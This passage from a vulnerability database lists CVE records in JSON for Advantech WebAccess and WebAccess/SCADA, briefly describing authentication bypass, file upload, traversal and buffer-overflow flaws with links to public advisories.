"version_value": "Advantech WebAccess 8.1" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS)." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Advantech WebAccess AUTHENTICATION BYPASS" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2017-04", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "name": "95410", "refsource": "BID", "url": "http://www.securityfocus.com/bid/95410" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-5152", "datePublished": "2017-02-13T21:00:00", "dateReserved": "2017-01-03T00:00:00", "dateUpdated": "2024-08-05T14:55:34.908Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-7505
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T06:31:03.776Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a TFTP application has unrestricted file uploads to the web application without authorization, which may allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-264", "description": "IMPROPER AUTHORIZATION CWE-264", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-7505", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a TFTP application has unrestricted file uploads to the web application without authorization, which may allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER AUTHORIZATION CWE-264" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-7505", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-02-26T00:00:00", "dateUpdated": "2024-09-16T22:29:56.539Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-3942
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2019-15 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: 8.3.4 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.802Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2019-15" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "8.3.4" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.4 does not properly restrict an RPC call that allows unauthenticated, remote users to read files. An attacker can use this vulnerability to recover the administrator password." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-284", "description": "CWE-284 Improper Access Control", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T16:04:29", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2019-15" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "ID": "CVE-2019-3942", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "8.3.4" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.4 does not properly restrict an RPC call that allows unauthenticated, remote users to read files. An attacker can use this vulnerability to recover the administrator password." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-284 Improper Access Control" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2019-15", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2019-15" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2019-3942", "datePublished": "2020-04-01T16:04:29", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-08-04T19:26:27.802Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-9202
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-15-258-04 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T13:40:24.973Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-258-04" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2015-09-15T00:00:00", "descriptions": [ { "lang": "en", "value": "Multiple stack-based buffer overflows in an unspecified DLL file in Advantech WebAccess before 8.0_20150816 allow remote attackers to execute arbitrary code via a crafted file that triggers long string arguments to functions." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2015-09-28T01:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-258-04" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2014-9202", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple stack-based buffer overflows in an unspecified DLL file in Advantech WebAccess before 8.0_20150816 allow remote attackers to execute arbitrary code via a crafted file that triggers long string arguments to functions." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-15-258-04", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-258-04" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2014-9202", "datePublished": "2015-09-28T01:00:00", "dateReserved": "2014-12-02T00:00:00", "dateUpdated": "2024-08-06T13:40:24.973Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0852
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.137Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess before 8.1 allows remote attackers to bypass an intended administrative requirement and obtain file or folder access via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0852", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess before 8.1 allows remote attackers to bypass an intended administrative requirement and obtain file or folder access via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0852", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.137Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-3953
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2019-17 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess/SCADA |
Version: 8.4.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.492Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2019-17" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess/SCADA", "vendor": "n/a", "versions": [ { "status": "affected", "version": "8.4.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 10012 RPC call." } ], "problemTypes": [ { "descriptions": [ { "description": "Stack-based Buffer Overflow", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-06-18T22:53:01", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2019-17" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "ID": "CVE-2019-3953", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess/SCADA", "version": { "version_data": [ { "version_value": "8.4.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 10012 RPC call." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Stack-based Buffer Overflow" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2019-17", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2019-17" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2019-3953", "datePublished": "2019-06-18T22:53:01", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-08-04T19:26:27.492Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-10985
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-178-05 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-622/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | WebAccess | WebAccess/SCADA |
Version: Versions 8.3.5 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T22:40:15.691Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-622/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "WebAccess", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior" } ] } ], "datePublic": "2019-06-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In WebAccess/SCADA, Versions 8.3.5 and prior, a path traversal vulnerability is caused by a lack of proper validation of a user-supplied path prior to use in file operations. An attacker can leverage this vulnerability to delete files while posing as an administrator." } ], "problemTypes": [ { "descriptions": [ { "description": "Directory Traversal (Local File Inclusion)", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-02T16:06:09", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-622/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-10985", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior" } ] } } ] }, "vendor_name": "WebAccess" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess/SCADA, Versions 8.3.5 and prior, a path traversal vulnerability is caused by a lack of proper validation of a user-supplied path prior to use in file operations. An attacker can leverage this vulnerability to delete files while posing as an administrator." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Directory Traversal (Local File Inclusion)" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-622/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-622/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-10985", "datePublished": "2019-06-28T20:05:33", "dateReserved": "2019-04-08T00:00:00", "dateUpdated": "2024-08-04T22:40:15.691Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-10589
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:39:08.371Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-22", "description": "PATH TRAVERSAL CWE-22", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-10589", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a path transversal vulnerability has been identified, which may allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "PATH TRAVERSAL CWE-22" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-10589", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-05-01T00:00:00", "dateUpdated": "2024-09-17T01:20:33.098Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-8841
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:10:46.210Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an improper privilege management vulnerability may allow an authenticated user to modify files when read access should only be given to the user." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-269", "description": "IMPROPER PRIVILEGE MANAGEMENT CWE-269", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-8841", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an improper privilege management vulnerability may allow an authenticated user to modify files when read access should only be given to the user." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER PRIVILEGE MANAGEMENT CWE-269" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-8841", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-03-20T00:00:00", "dateUpdated": "2024-09-16T16:14:04.315Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0855
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.zerodayinitiative.com/advisories/ZDI-16-126 | x_refsource_MISC | |
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-124 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-125 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-122 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-123 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.047Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-126" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-124" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-125" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-122" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-123" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Directory traversal vulnerability in Advantech WebAccess before 8.1 allows remote attackers to list arbitrary virtual-directory files via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-01T15:57:02", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-126" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-124" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-125" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-122" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-123" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0855", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Directory traversal vulnerability in Advantech WebAccess before 8.1 allows remote attackers to list arbitrary virtual-directory files via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-126", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-126" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "name": 